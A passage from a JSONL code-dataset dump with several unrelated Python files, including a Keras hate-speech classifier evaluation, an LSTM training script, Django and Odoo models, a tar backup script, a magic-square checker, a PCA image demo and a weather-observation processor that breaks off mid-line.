steps=None)\n\ny_predict = np.argmax(y_predict, axis=1)\ny_test = np.argmax(y_test, axis=1)\n\n\n\nprint(\"Precision\\t\", precision_score(y_test, y_predict, average=None))\nprint(\"Recall \\t\", recall_score(y_test, y_predict, average=None))\nprint(\"F1-Score \\t\", f1_score(y_test, y_predict, average=None))\nprint(\"ROC-AUC \\t\", roc_auc_score(y_test, y_predict, average=None))\n\ntarget_names = ['0', '1']\nprint (classification_report (y_test, y_pred = y_predict, target_names=target_names))\nf = open (\"GRUModel/hatEvalGRUEN_HS.txt\",\"w\")\nf.write(classification_report(y_test, y_pred = y_predict, target_names=target_names))\nimport matplotlib.pyplot as plt\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.savefig('GRUModel/epochVsAccEN_HS.pdf')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.savefig('GRUModel/epochVslossEN_HS.pdf')\nplt.show()\n\n#############heat map############\n\nimport matplotlib.pyplot as plt\nimport seaborn\nfrom sklearn.metrics import confusion_matrix\n\nseaborn.countplot(df['HS'])\nplt.xlabel('Label')\nplt.title('Classification')\nplt.show()\n\nconfusion_matrix = confusion_matrix(y_test , y_predict)\nacc = np.sum(confusion_matrix.diagonal()) / np.sum(confusion_matrix)\nprint('Overall accuracy: {} %'.format(acc*100))\nmatrix_proportions = np.zeros((2, 2))\nfor i in range(0, 2):\n matrix_proportions[i, :] = confusion_matrix[i, :] / float(confusion_matrix[i, :].sum())\nnames = ['Non AG', 'AG']\nconfusion_df = pd.DataFrame(matrix_proportions, index=names, columns=names)\nplt.figure(figsize=(10, 10))\nseaborn.heatmap(confusion_df, annot=True, annot_kws={\"size\": 20}, cbar=False, square=True, fmt='.2f', cmap=\"RdBu_r\")\nplt.ylabel(r'True categories', fontsize=25)\nplt.xlabel(r'Predicted categories', fontsize=25)\nplt.tick_params(axis='both', which='major', labelsize=10)\nplt.tick_params(axis='both', which='minor', labelsize=10)\n# #Uncomment line below if you want to save the output\nplt.savefig('GRUModel/ConfusionMatrixGRUEN_HS.pdf')\n\n\n\n\n\n","sub_path":"models/hateEvalGRU.py","file_name":"hateEvalGRU.py","file_ext":"py","file_size_in_byte":8426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324444333","text":"import kerasPredict.model.lstmTimeSeries as lstm\nimport time\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom keras.models import load_model\nimport keras.backend.tensorflow_backend as KTF\nimport tensorflow as tf\nfrom keras import optimizers,losses\nimport kerasPredict.Evaluate as ev\n\nKTF.set_session(tf.Session(config=tf.ConfigProto(device_count={'cpu':0})))\n\n\ndef mdsave(model,model_path,index_num,sum_epoch,pos_range):\n model_name = str(index_num) + '_' + str(sum_epoch) + '_pos_' + str(pos_range) + '_lstm_model' # 37_pos_40_lstm_model\n model.save(model_path + model_name + '.h5')\n model.save_weights(model_path + model_name + '_weights.h5')\n\n\ndef fig_show(predict_ten, pos_target, pos_cls = None):\n plt.plot(predict_ten,label='pred')\n plt.plot(pos_target,label='true')\n # plt.plot(pos_cls * 3, label='close')\n #plt.plot(ave_pred,label='ave pred')\n plt.legend(loc='upper right')\n plt.rcParams['figure.figsize'] = (12.0, 7.0)\n plt.show()\n return plt\n\ndef fig_save(plt,model_path,index_num,sum_epoch,pos_range):\n plt.rcParams['savefig.dpi'] = 500\n model_name = str(index_num) + '_' + str(sum_epoch) + '_pos_' + str(pos_range) + '_lstm_model'\n plt.savefig(model_path + model_name + '.png', format='png',dpi=500)\n\ndef loadModel(model_path,index_n=1, epochs=2, pos_range=0.25):\n model_name = str(index_n) + '_' + str(epochs) + '_pos_' + str(pos_range) + '_lstm_model' # 37_pos_40_lstm_model\n model = load_model(model_path + model_name + '.h5')\n model.load_weights(model_path + model_name + '_weights.h5')\n return model,model_name\n\n\n\nimport dataProcess.FeaturesGen as FG\n\nif __name__=='__main__':\n global_start_time = time.time()\n epochs = 17\n seq_len = 100\n\n model_path = '../model_linear/top_model/'\n POS = 'pos'\n CLS = 'cls'\n train_mode = POS\n\n\n print('> Loading data... ')\n #nor_result = result\n path = '../dataProcess/data_file/'\n\n pos_range = 0.2\n is_save = 0\n if is_save == 1:\n (X_train, y_train, X_test, y_test) = FG.get_train_save(path, pos_range) #从互联网下载数据并预处理\n else:\n file_name = '../dataProcess/data_file/pos_0.2_train_pos_z.npz'\n (X_train, y_train, X_test, y_test) = FG.get_train_load(file_name = file_name)\n print('> Data Loaded. Compiling...')\n\n i = 0\n for y in y_train:\n if y < 0.5:\n y_train[i] = 0.5\n # elif y <= 0.8:\n # y_train[i] = 0.8\n # elif y <= 0.9:\n # y_train[i] = 0.9\n i += 1\n\n xcnn_train = np.reshape(X_train, [X_train.shape[0], 1, 100, 5])\n xcnn_test = np.reshape(X_test, [X_test.shape[0], 1, 100, 5])\n\n start = time.time()\n input_nodes = X_train.shape[2]\n if y_train.ndim == 1:\n output_nodes = 1\n else:\n output_nodes = y_train.shape[1]\n\n\n index_num = 1\n sum_epoch = 0 #234\n\n #从之前训练的模型中加载\n # model_linear,model_name = loadModel(model_path,index_n=1, epochs = sum_epoch, pos_range=0.2)\n model_linear = lstm.share_model_linear() #创建新模型\n model_linear.summary()\n\n\n #loss_model = losses.distance_categorical_crossentropy\n #loss_model = losses.mae_categorical_crossentropy\n #loss_model = losses.categorical_crossentropy\n #loss_linear = losses.weight_mean_absolute_error\n loss_linear = losses.mae\n #rmsprop = optimizers.RMSprop(lr=0.0001, rho=0.9, epsilon=1e-06)\n opti = optimizers.Adam(lr=0.0005)\n #model.compile(loss=loss_model, optimizer=rmsprop, metrics=['accuracy'])\n model_linear.compile(loss=loss_linear, optimizer=opti, metrics=['accuracy'])\n for _ in range(2):\n #pre_loss = new_loss.copy()\n for _ in range(2):\n epochs =1\n hist = model_linear.fit(\n [X_train,xcnn_train],\n y_train,\n batch_size =70,\n nb_epoch = epochs,\n validation_split = 0.4,\n #class_weight={0:2, 1:1.8, 2:1.8, 3:0.6, 4:0.1, 5:0.1, 6:0.1, 7:0.6, 8:1.8, 9:1.8, 10:2}\n #class_weight = {0: 1.8, 1: 1.8, 2: 1.8, 3: 0.1, 4: 0.1, 5: 0.1, 6: 0.1, 7: 0.1, 8: 0.1, 9: 0.1, 10: 0.1}\n #class_weight={0: 0.1, 1: 0.1, 2: 0.1, 3: 0.1, 4: 0.1, 5: 0.1, 6: 0.1, 7: 0.1, 8: 1.8, 9: 1.8, 10: 1.8}\n )\n sum_epoch += epochs\n new_loss = hist.history['loss']\n mdsave(model_linear, model_path, index_num, sum_epoch, pos_range)\n\n predict_ten = model_linear.predict([X_test, xcnn_test])\n predict_ten *= 100\n pos_target = y_test * 100\n predict_ten = np.clip(predict_ten, 0, 100)\n pos_target = np.reshape(np.clip(pos_target, 0, 100), [len(pos_target), 1])\n\n plt.plot(predict_ten,label='pred')\n plt.plot(pos_target,label='true')\n\n plt.legend(loc='upper right')\n plt.rcParams['figure.figsize'] = (12.0, 7.0)\n # plt.show()\n\n plt.rcParams['savefig.dpi'] = 300\n model_name = str(index_num) + '_' + str(sum_epoch) + '_pos_' + str(pos_range) + '_lstm_model'\n figer_path = '../figer_result/top_pre_fig/top_'\n plt.savefig(figer_path + model_name + '.png', format='png', dpi=300)\n plt.close()\n\n # ##评估 计算查准率,下穿18\n # turn_error_value = ev.Turn_error(predict_ten, pos_target,8)\n # ev_save_text = '下穿8 turn_error: ' + str(turn_error_value)\n\t\t #\n # up_turn_error_value = ev.up_Turn_error(predict_ten, pos_target,10)\n # ev_save_text = ev_save_text + '\\n 上穿10 turn_error: ' + str(up_turn_error_value)\n\t\t #\n # ev.save_result(ev_save_text, model_path = figer_path, index = index_num, epoch = sum_epoch)\n\n\n\n\n","sub_path":"kerasPredict/top_predict.py","file_name":"top_predict.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178250573","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.conf import settings\nfrom likes.models import Like\nfrom django.contrib.contenttypes.fields import GenericRelation\nimport os\n\n\n\nclass Question(models.Model):\n name = models.CharField(max_length=255, verbose_name=u'Название вопроса')\n author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='questions', verbose_name=u'Автор')\n created = models.DateTimeField(auto_now_add=True, verbose_name=u'Время создания')\n updated = models.DateTimeField(auto_now=True, verbose_name=u'Время редактирования')\n categories = models.ManyToManyField('categories.Category', related_name='questions', verbose_name=u'Категории')\n text = models.TextField(verbose_name=u'Вопрос')\n likes = GenericRelation(Like, null=True, blank=True)\n is_archive = models.BooleanField(default=False, verbose_name=u'В архиве')\n\n class Meta:\n verbose_name = u'Вопрос'\n verbose_name_plural = u'Вопросы'\n ordering = 'name', 'created'\n\n\n def __unicode__(self):\n return self.name\n","sub_path":"project/src/questions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403488779","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n# Filename = custom_backup.py\n\nimport os\nimport time\n\nsource_dir = '/home/oracle/LearnPython/'\ntarget_dir = '/home/oracle/Documents/backup'\n\ntarget = target_dir + time.strftime('%Y%m%d%H%M%S') + '.tar'\ntar_command = 'tar -cv -f {} {}' .format(target, source_dir)\n\n#print(tar_command) 打印一下命令,检查错误\n\nif os.system(tar_command) == 0:\n print('Successful backup')\nelse:\n print('backup failed')","sub_path":"Python/exercise/custom_backup/custom_backup.py","file_name":"custom_backup.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442625883","text":"import click\n\n\n@click.command()\n@click.argument('activity', default='-', required=True)\ndef cli(activity):\n \"\"\"\n Track how much time you spend on different activities throughout the day!\n ACTIVITY is the type of activity you want to start tracking. Examples: working, reading, studying.\n \"\"\"\n click.echo('Started tracking time for %s' % activity)\n","sub_path":"commandline_client/timetrack.py","file_name":"timetrack.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254643764","text":"# -*- coding: utf-8 -*-\nfrom openerp.tools.translate import _\nfrom datetime import datetime, timedelta, date\nfrom openerp.osv import fields, osv\nfrom openerp import tools\nimport time\nimport pytz\n\n\nclass crm_lead(osv.osv):\n _inherit=\"crm.lead\"\n\n _columns = {\n 'contact_last_name':fields.char('Last Name',size=128),\n }\n\n def on_change_partner_id(self, cr, uid, ids, partner_id, context={}):\n lead_addrs = []\n values = {'lead_add_line': False, 'partner_name' : False,\\\n 'contact_name' : False, 'contact_last_name':False,\\\n 'street' : False, 'street2' : False, 'city' : False, \\\n 'state_id' : False, 'country_id' : False, 'email_from' : False, \\\n 'phone' : False, 'mobile' : False, 'fax' : False,\n 'partner_address_id': False}\n if partner_id:\n values = super(crm_lead, self).on_change_partner_id(cr, uid, ids, \\\n partner_id=partner_id, context=context)['value']\n partner = self.pool.get('res.partner').browse(cr, uid, \\\n partner_id, context=context)\n if partner.child_ids:\n for child in partner.child_ids:\n child_data = {\n 'partner_address_id': child.id or False,\n 'phone': child.phone or False,\n 'fax': child.fax or False,\n 'email': child.email or False,\n 'mobile': child.mobile or False,\n 'lead_id': ids and ids[0] or False,\n }\n lead_addrs.append([0,0,child_data])\n values.update({'lead_add_line': lead_addrs,\\\n 'partner_address_id': \\\n partner.child_ids and partner.child_ids[0].id or False})\n if partner.parent_id:\n values.update({'partner_name' : partner.parent_id.name,\n 'contact_name' : partner.first_name,\n 'contact_last_name' : partner.last_name,\n 'function' : partner.function,\n });\n else:\n values.update({'partner_name' : False,\n 'contact_name' : partner.first_name,\n 'contact_last_name' : partner.last_name,\n 'function' : False,\n });\n return {'value' : values}\n\n def _lead_create_contact(self, cr, uid, lead, name, is_company, \\\n parent_id=False, context=None):\n partner = self.pool.get('res.partner')\n if type(name) == dict:\n vals = {\n 'first_name': name['first_name'] or '',\n 'last_name': name['last_name'] or '',\n 'user_id': lead.user_id.id,\n 'comment': lead.description,\n 'section_id': lead.section_id.id or False,\n 'parent_id': parent_id,\n 'phone': lead.phone,\n 'mobile': lead.mobile,\n 'email': tools.email_split(lead.email_from) and \\\n tools.email_split(lead.email_from)[0] or False,\n 'fax': lead.fax,\n 'title': lead.title and lead.title.id or False,\n 'function': lead.function,\n 'street': lead.street,\n 'street2': lead.street2,\n 'zip': lead.zip,\n 'city': lead.city,\n 'country_id': lead.country_id and lead.country_id.id or False,\n 'state_id': lead.state_id and lead.state_id.id or False,\n 'is_company': is_company,\n 'type': 'contact'\n }\n else:\n vals = {'name': name,\n 'first_name': name,\n 'user_id': lead.user_id.id,\n 'comment': lead.description,\n 'section_id': lead.section_id.id or False,\n 'parent_id': parent_id,\n 'phone': lead.phone,\n 'mobile': lead.mobile,\n 'email': tools.email_split(lead.email_from) and \\\n tools.email_split(lead.email_from)[0] or False,\n 'fax': lead.fax,\n 'title': lead.title and lead.title.id or False,\n 'function': lead.function,\n 'street': lead.street,\n 'street2': lead.street2,\n 'zip': lead.zip,\n 'city': lead.city,\n 'country_id': lead.country_id and lead.country_id.id or False,\n 'state_id': lead.state_id and lead.state_id.id or False,\n 'is_company': is_company,\n 'type': 'contact'\n }\n partner = partner.create(cr, uid, vals, context=context)\n return partner\n\n def _create_lead_partner(self, cr, uid, lead, context=None):\n partner_id = False\n if lead.partner_name and lead.contact_name:\n partner_id = self._lead_create_contact(cr, uid, lead, \\\n lead.partner_name, True, context=context)\n full_name = {'first_name': lead.contact_name, \\\n 'last_name': lead.contact_last_name or ''}\n partner_id = self._lead_create_contact(cr, uid, lead,\\\n full_name, False, partner_id, context=context)\n elif lead.partner_name and not lead.contact_name:\n partner_id = self._lead_create_contact(cr, uid, lead, \\\n lead.partner_name, True, context=context)\n elif not lead.partner_name and lead.contact_name:\n full_name = {'first_name': lead.contact_name,\\\n 'last_name': lead.contact_last_name or ''}\n partner_id = self._lead_create_contact(cr, uid, lead,\\\n full_name, False, context=context)\n elif lead.email_from and self.pool.get('res.partner').\\\n _parse_partner_name(lead.email_from, context=context)[0]:\n contact_name = self.pool.get('res.partner').\\\n _parse_partner_name(lead.email_from, context=context)[0]\n full_name = {'first_name': lead.contact_name, 'last_name': ''}\n partner_id = self._lead_create_contact(cr, uid, lead, \\\n full_name, False, context=context)\n else:\n raise osv.except_osv(\n _('Warning!'),\n _('No customer name defined. \\\n Please fill one of the following fields: Company Name,\\\n Contact Name or Email (\"Name \")')\n )\n return partner_id\n\ncrm_lead()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"vnc_ose/crm.py","file_name":"crm.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111512184","text":"\ndef parseCell(cell, intMaximum):\n # The checks for a \"valid cell\" are done here as follows:\n # - Is it actually an int?\n # - Is it within range of 1 to col*rows?\n try:\n intCell = int(cell)\n if (intCell > 0) & (intCell < intMaximum):\n return intCell\n return False\n except:\n return False\n\ndef isValidMagicSquare(listSquare):\n intDiagTotal = 0\n intContraDiagTotal = 0\n intTotalRows = len(listSquare)\n # The first rows length will be our number of columns\n # All rows should equal this, as all cells for every column should be filled\n intTotalColumns = len(listSquare[0])\n\n # Ensure we actually have a square\n # This avoids fatal \"list index out of range\" errors later with invalid files\n if intTotalRows != intTotalColumns:\n print(\"Unequal number of rows/columns\")\n return False\n\n # This is really just n ^ 2, but without importing any square method\n intMaximum = (intTotalColumns * intTotalRows) + 1\n\n # This is a very clever loop that may look deceivingly complex. It works as follows:\n # - Loop over each column index:\n # - Loop over each row index:\n # - Validate the next cell on the row and increment the total\n # - Validate the next cell on the column and increment the total\n # - Check if the current row's length is same as the first - quit early if so!\n # - If the row/column totals don't match, we quit early here too\n # - Otherwise, we can also grab the next cell on the diagonals,\n # and increment those totals too\n # Unfortunately we have to wait later to validate these as we must go over EVERY row/col\n # - Now validate ALL totals match. If there is a problem here, it must be related to the\n # diagonal totals as we checked the rows and columns earlier\n for y in range(len(listSquare)):\n intRowTotal = 0\n intColumnTotal = 0\n if len(listSquare[y]) != intTotalColumns:\n print(\"Row \"+str(y+1)+\" has an incorrect length\")\n return False\n for x in range(len(listSquare)):\n cellNextRow = listSquare[x][y]\n intNextRow = parseCell(cellNextRow, intMaximum)\n if intNextRow == False:\n print(\"Invalid cell '\"+cellNextRow+\"'\")\n return False\n cellNextCol = listSquare[y][x]\n intNextCol = parseCell(cellNextCol, intMaximum)\n if intNextCol == False:\n print(\"Invalid cell '\"+cellNextCol+\"'\")\n return False\n intRowTotal += intNextRow\n intColumnTotal += intNextCol\n if intRowTotal != intColumnTotal:\n print(\"There is a problem with your column / row totals\")\n return False\n # We dont need to re-run parseCell here as all cells should be caught above\n intDiagTotal += int(listSquare[y][y])\n intContraDiagTotal += int(listSquare[len(listSquare)-y-1][y])\n if intRowTotal == intColumnTotal == intDiagTotal == intContraDiagTotal:\n return True\n print(\"There is a problem with your diagonal totals\")\n return False\n\ndef hasDuplicates(readContents):\n # A simple way to duplicate check the values in the square\n # is to compare the length of the contents against a Set (which removes duplicates)\n listContents = readContents.split()\n return len(listContents) != len(set(listContents))\n\ndef writeFile(readContents, strFilename):\n fileOpen = open(\"VALID_\"+strFilename, \"w\")\n fileOpen.write(readContents)\n fileOpen.close()\n\ndef parseFile(readContents):\n # We want to validate the square in as FEW iterations as possible\n # So we will parse the file contents into a matrix, where each nested list\n # contains the row's values\n # This will help us loop efficiently later\n listStringRows = readContents.splitlines()\n\n listListRows = []\n\n # We could do a map here as this is only one line per itt, but then we'd have to convert back to list\n # Would probably end up being more confusing to the next reader\n for row in listStringRows:\n listListRows.append(row.split())\n return listListRows\n\ndef readData():\n # While a valid file is NOT found, prompt the user to input a filename\n while True:\n try:\n strFileName = input(\"> \")\n io = open(strFileName, 'r')\n return [io, strFileName]\n except FileNotFoundError:\n print(\"'\"+strFileName+\"' not found\")\n\nif __name__ == \"__main__\":\n print(\"This program reads a text file and validates if the contents are a magic square\\nEnter the filename below\")\n # Pull out the file contents plus the filename we will be using later if valid\n # Firstly check for duplicates, if found we can quit before any iteration is needed\n # Then validate the file contents by iterating through the square\n # If successful we can write the VALID_ file\n # Otherwise, print and quit\n listReturn = readData()\n io = listReturn[0]\n strFilename = listReturn[1]\n readContents = io.read()\n io.close()\n\n bDuplicates = hasDuplicates(readContents)\n if bDuplicates:\n print(\"Square has duplicates\")\n exit()\n\n listSquare = parseFile(readContents)\n bValid = isValidMagicSquare(listSquare)\n if bValid:\n print(\"Writing valid square\")\n writeFile(readContents, strFilename)\n else:\n print(\"Square is not valid\")\n exit()\n","sub_path":"MagicSquare.py","file_name":"MagicSquare.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368962428","text":"# import pdb\nfrom PIL import Image\nfrom numpy import *\nfrom pylab import *\nimport imtools\nimport pca\n\nimlist = imtools.get_imlist('a_thumbs/')\n\nim = array(Image.open(imlist[0]))\nm, n = im.shape[0:2]\nimnbr = len(imlist)\n\n# pdb.set_trace()\nimmatrix = array([array(Image.open(im)).flatten() for im in imlist], 'f')\n\nV, S, immean = pca.pca(immatrix)\n\nfigure()\ngray()\nsubplot(2, 4, 1)\nimshow(immean.reshape(m, n))\nfor i in range(7):\n subplot(2, 4, i+2)\n imshow(V[i].reshape(m, n))\n\nshow()","sub_path":"ch01/font_pca.py","file_name":"font_pca.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102591642","text":"#\n# Copyright (c) 2018 Jonathan Weyn \n#\n# See the file LICENSE for your rights.\n#\n\n\"\"\"\nMethods for processing OBS data.\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport pickle\nfrom collections import OrderedDict\nfrom mosx.MesoPy import Meso\nfrom siphon.simplewebservice.wyoming import WyomingUpperAir\nfrom metpy.calc import interp\nfrom mosx.util import generate_dates, get_array, read_pkl\n\n\ndef upper_air(config, station_id, sounding_station_id, date, use_nan_sounding=False, use_existing=True, save=True):\n \"\"\"\n Retrieves upper-air data and interpolates to pressure levels. If use_nan_sounding is True, then if a retrieval\n error occurs, a blank sounding will be returned instead of an error.\n :param config:\n :param station_id: station ID of surface station used\n :param sounding_station_id: station ID of sounding station to use\n :param date: datetime\n :param use_nan_sounding: bool: if True, use sounding of NaNs instead of raising an error\n :param use_existing: bool: preferentially use existing soundings in sounding_data_dir\n :param save: bool: if True, save processed soundings to sounding_data_dir\n :return:\n \"\"\"\n variables = ['height', 'temperature', 'dewpoint', 'u_wind', 'v_wind']\n \n # Define levels for interpolation: same as model data, except omitting lowest_p_level\n plevs = [600, 750, 850, 925]\n pres_interp = np.array([p for p in plevs if p <= config['lowest_p_level']])\n \n # Try retrieving the sounding, first checking for existing\n if config['verbose']:\n print('upper_air: retrieving sounding for %s' % datetime.strftime(date, '%Y%m%d%H'))\n nan_sounding = False\n retrieve_sounding = False\n sndg_data_dir = config['Obs']['sounding_data_dir']\n if not(os.path.isdir(sndg_data_dir)):\n os.makedirs(sndg_data_dir)\n sndg_file = '%s/%s_SNDG_%s.pkl' % (sndg_data_dir, station_id, datetime.strftime(date, '%Y%m%d%H'))\n if use_existing:\n try:\n data = read_pkl(sndg_file)\n if config['verbose']:\n print(' Read from file.')\n except:\n retrieve_sounding = True\n else:\n retrieve_sounding = True\n if retrieve_sounding:\n try:\n dset = WyomingUpperAir.request_data(date, config['Obs']['sounding_station_id'])\n except:\n # Try again\n try:\n dset = WyomingUpperAir.request_data(date, config['Obs']['sounding_station_id'])\n except:\n if use_nan_sounding:\n if config['verbose']:\n print('upper_air: warning: unable to retrieve sounding; using nan.')\n nan_sounding = True\n else:\n raise ValueError('error retrieving sounding for %s' % date)\n \n # Retrieve pressure for interpolation to fixed levels\n if not nan_sounding:\n pressure = dset.variables['pressure']\n pres = np.array([p.magnitude for p in list(pressure)]) # units are hPa\n \n # Get variables and interpolate; add to dictionary\n data = OrderedDict()\n for var in variables:\n if not nan_sounding:\n var_data = dset.variables[var]\n var_array = np.array([v.magnitude for v in list(var_data)])\n var_interp = interp(pres_interp, pres, var_array)\n data[var] = var_interp.tolist()\n else:\n data[var] = [np.nan] * len(pres_interp)\n \n # Save\n if save and not nan_sounding:\n with open(sndg_file, 'wb') as handle:\n pickle.dump(data, handle, protocol=2)\n\n return data\n\ndef get_obs_hourly(config, station_id, api_dates, vars_api, units):\n \"\"\"\n Retrieve hourly obs data in a pd dataframe. In order to ensure that there is no missing hourly indices, use\n dataframe.reindex on each retrieved dataframe.\n :param station_id: station ID to obtain data from\n :param api_dates: dates from generate_dates\n :param vars_api: str: string formatted for api call var parameter\n :param units: str: string formatted for api call units parameter\n :return: pd.DataFrame: formatted hourly obs DataFrame\n \"\"\"\n # Initialize Meso\n m = Meso(token=config['meso_token'])\n if config['verbose']:\n print('get_obs_hourly: MesoPy initialized for station %s' % station_id)\n\n # Retrieve data\n obs_final = pd.DataFrame()\n for api_date in api_dates:\n if config['verbose']:\n print('get_obs_hourly: retrieving data from %s to %s' % api_date)\n obs = m.timeseries(stid=station_id, start=api_date[0], end=api_date[1], vars=vars_api, units=units,\n hfmetars='0')\n obspd = pd.DataFrame.from_dict(obs['STATION'][0]['OBSERVATIONS'])\n\n # Rename columns to requested vars\n obs_var_names = obs['STATION'][0]['SENSOR_VARIABLES']\n obs_var_keys = list(obs_var_names.keys())\n col_names = list(map(''.join, obspd.columns.values))\n for c in range(len(col_names)):\n col = col_names[c]\n for k in range(len(obs_var_keys)):\n key = obs_var_keys[k]\n if col == list(obs_var_names[key].keys())[0]:\n col_names[c] = key\n obspd.columns = col_names\n\n # Change datetime column to datetime object\n dateobj = pd.to_datetime(obspd['date_time'])\n obspd['date_time'] = dateobj\n datename = 'date_time'\n obspd = obspd.rename(columns={'date_time': datename})\n\n # Reformat data into hourly obs\n # Find mode of minute data: where the hourly metars are\n if config['verbose']:\n print('get_obs_hourly: finding METAR observation times...')\n minutes = []\n for row in obspd.iterrows():\n date = row[1][datename]\n minutes.append(date.minute)\n minute_count = np.bincount(np.array(minutes))\n rev_count = minute_count[::-1]\n minute_mode = minute_count.size - rev_count.argmax() - 1\n\n if config['verbose']:\n print('get_obs_hourly: finding hourly data...')\n obs_hourly = obspd[pd.DatetimeIndex(obspd[datename]).minute == minute_mode]\n obs_hourly.date_time = pd.to_datetime(obs_hourly[datename].values)\n obs_hourly = obs_hourly.set_index(datename)\n if 'precip_accum_one_hour' in vars_api:\n # May not have precip if none is recorded\n try:\n obs_hourly['precip_accum_one_hour'].fillna(0.0, inplace=True)\n except KeyError:\n obs_hourly['precip_accum_one_hour'] = 0.0\n\n # Need to reorder the column names\n obs_hourly.sort_index(axis=1, inplace=True)\n\n # Remove any duplicate rows\n obs_hourly = obs_hourly[~obs_hourly.index.duplicated(keep='last')]\n\n # Re-index by hourly. Fills missing with NaNs.\n expected_start = datetime.strptime(api_date[0], '%Y%m%d%H%M').replace(minute=minute_mode)\n expected_end = datetime.strptime(api_date[1], '%Y%m%d%H%M')\n expected_times = pd.date_range(expected_start, expected_end, freq='H').to_pydatetime()\n obs_hourly = obs_hourly.reindex(expected_times)\n var_list = vars_api.split(',')\n obs_final = pd.concat((obs_final, obs_hourly))\n\n # Remove any duplicate rows from concatenation\n obs_final = obs_final[~obs_final.index.duplicated(keep='last')]\n\n return obs_final\n\n\ndef reindex_hourly(df, start, end, interval, end_23z=False, use_rain_max=False):\n\n def last(values):\n return values.iloc[-1]\n\n if end_23z:\n new_end = pd.Timestamp(end.to_pydatetime() - timedelta(hours=1))\n else:\n new_end = end\n period = pd.date_range(start, end, freq='%dH' % interval)\n\n # Create a column with the new index an ob falls into\n if type(df.index.values[0]) == np.int64: #observations from csv file\n df.date_time=np.array([datetime.strptime(date, '%Y-%m-%d %H:%M:%S') for date in df['date_time'].values],dtype='datetime64[s]')\n df.set_index('date_time',inplace=True)\n df['period'] = (df.index.values > period.values[..., np.newaxis]).sum(0)\n df['DateTime'] = df.index.values\n aggregate = OrderedDict()\n col_names = df.columns.values\n for col in col_names:\n if not(col.lower().startswith('precip')) and not(col.lower().startswith('rain')):\n aggregate[col] = last\n else:\n if use_rain_max:\n aggregate[col] = np.max\n else:\n aggregate[col] = np.sum\n df_reindex = df.loc[start:new_end].groupby('period').agg(aggregate)\n try:\n df_reindex = df_reindex.drop('period', axis=1)\n except (ValueError, KeyError):\n pass\n df_reindex = df_reindex.set_index('DateTime')\n return df_reindex\n\n\ndef obs(config, output_files=None, csv_files=None, num_hours=24, interval=3,use_nan_sounding=False, use_existing_sounding=True):\n \"\"\"\n Generates observation data from MesoWest and UCAR soundings and saves to a file, which can later be retrieved for\n either training data or model run data.\n :param config:\n :param output_files: str: output file path if just one station, or list of output file paths if multiple stations\n :param csv_files: str: path to csv file containing observations if just one station, or list of paths to csv files if multiple stations\n :param num_hours: int: number of hours to retrieve obs\n :param interval: int: retrieve obs every 'interval' hours\n :param use_nan_sounding: bool: if True, uses a sounding of NaNs rather than omitting a day if sounding is missing\n :param use_existing_sounding: bool: if True, preferentially uses saved soundings in sounding_data_dir\n :return:\n \"\"\"\n if config['multi_stations']: #Train on multiple stations\n station_ids = config['station_id']\n if len(station_ids) != len(output_files): #There has to be the same number of output files as station IDs, so raise error if not\n raise ValueError(\"There must be the same number of output files as station IDs\")\n if len(station_ids) != len(csv_files): #There has to be the same number of output files as station IDs, so raise error if not\n raise ValueError(\"There must be the same number of csv files as station IDs\")\n else:\n station_ids = [config['station_id']]\n if output_files is not None:\n output_files = [output_files]\n if csv_files is not None:\n csv_files = [csv_files]\n \n for i in range(len(station_ids)):\n station_id = station_ids[i]\n if output_files is None:\n output_file = '%s/%s_obs.pkl' % (config['SITE_ROOT'], station_id)\n else:\n output_file = output_files[i]\n \n if csv_files is None:\n csv_file = '%s/%s_obs.csv' % (config['SITE_ROOT'], station_id)\n else:\n csv_file = csv_files[i]\n \n start_date = datetime.strptime(config['data_start_date'], '%Y%m%d') - timedelta(hours=num_hours)\n dates = generate_dates(config)\n api_dates = generate_dates(config, api=True, start_date=start_date)\n\n \n # Retrieve station data\n if not os.path.exists(csv_file): #no observations saved yet\n # Look for desired variables\n vars_request = []\n vars = ['air_temp', 'altimeter', 'precip_accum_one_hour', 'relative_humidity','wind_speed', 'wind_direction','air_temp_low_6_hour', 'air_temp_high_6_hour', 'precip_accum_six_hour']\n m = Meso(token=config['meso_token'])\n if config['verbose']:\n print('obs: MesoPy initialized for station %s' % config['station_id'])\n print('obs: retrieving latest obs and metadata')\n latest = m.latest(stid=station_id)\n obs_list = list(latest['STATION'][0]['SENSOR_VARIABLES'].keys())\n # Add variables to the api request if they exist\n if config['verbose']:\n print('obs: searching for 6-hourly variables...')\n for var in vars:\n if var in obs_list:\n if config['verbose']:\n print('obs: found variable %s, adding to data' % var)\n vars_request += [var]\n \n # Add variables to the api request\n vars_api = ''\n for var 